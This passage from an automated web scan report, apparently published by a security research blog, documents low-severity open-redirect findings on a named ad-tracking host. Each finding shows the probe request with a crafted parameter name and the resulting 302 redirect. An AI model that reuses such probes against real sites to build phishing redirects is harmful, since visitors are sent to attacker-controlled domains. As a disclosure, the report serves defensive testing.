The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a2fb1007d6302d504/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /5/c=25/b=1225394?.a2fb1007d6302d504/=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:34 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7SQNBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQAzdQHU7z%2FII4whZgSARbk8geyAZ6KFaA%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydpIGSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJCRKrRpEyNMGMjQFNq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAUQFZHg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Location: http://.a2fb1007d6302d504/=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

4.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225400

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .af7444b5c923be2c5/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /5/c=25/b=1225400?.af7444b5c923be2c5/=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:09 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdzay8DAqJfyVl%2BMQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsACsbFRI%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1t7%2FX7bcYWBg1Et5qy8GEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWToCW3awQgTBjJ0hDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAQVhaNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/
Location: http://.af7444b5c923be2c5/=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

4.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1226041

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a87ccf957205615f6/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /5/c=25/b=1226041?.a87ccf957205615f6/=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7cx3DLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwBFQhZv; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfyduY7kBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSBjntBWS0aYMJChI7RpBzLfRmjTJmS%2BhTLXX2Q%2Bs1K8C7J5jAwcMnXq6BZxtU7CEKpvQBfiTtiFLsT5eDmmqp3oQnwVb9GFZM0uogsBAAadWGM%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Location: http://.a87ccf957205615f6/=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

Report generated by XSS.CX Research Blog at Mon Feb 28 09:43:09 CST 2011.